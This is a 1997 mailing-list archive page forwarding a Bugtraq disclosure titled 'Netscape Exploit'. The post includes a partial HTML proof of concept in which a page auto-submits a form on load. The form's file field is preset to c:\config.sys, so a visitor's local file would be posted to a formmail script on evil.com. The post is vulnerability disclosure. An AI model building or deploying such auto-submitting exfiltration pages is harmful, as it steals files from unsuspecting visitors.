[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Netscape Exploit

To: [email protected]
Subject: Netscape Exploit
From: Lucky Green <[email protected]>
Date: Sat, 14 Jun 1997 21:10:18 -0700
Sender: [email protected]


>Approved-By: [email protected]
>Date: 	Sat, 14 Jun 1997 19:21:30 -0500
>Reply-To: root <[email protected]>
>Sender: Bugtraq List <[email protected]>
>From: root <[email protected]>
>Subject:      Netscape Exploit
>To: [email protected]
>
>Here is a sample it isn't complete but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
>	NAME="daForm"
>	ACTION="http://evil.com/cgi-bin/formmail.pl"
>	METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="[email protected]">
>
>and so on and so forth...
--Lucky Green <[email protected]> PGP encrypted mail preferred.

  Put a stake through the heart of DES! Join the quest at
  http://www.frii.com/~rcv/deschall.htm

Follow-Ups:
- Re: Netscape Exploit
  - From: Tom Weinstein <[email protected]>

Prev by Date: Re: IBM sues critics?
Next by Date: Re: Impact of Netscape kernel hole
Prev by thread: Re: e$: Skins vs. Shirts
Next by thread: Re: Netscape Exploit
Index(es):
- Date
- Thread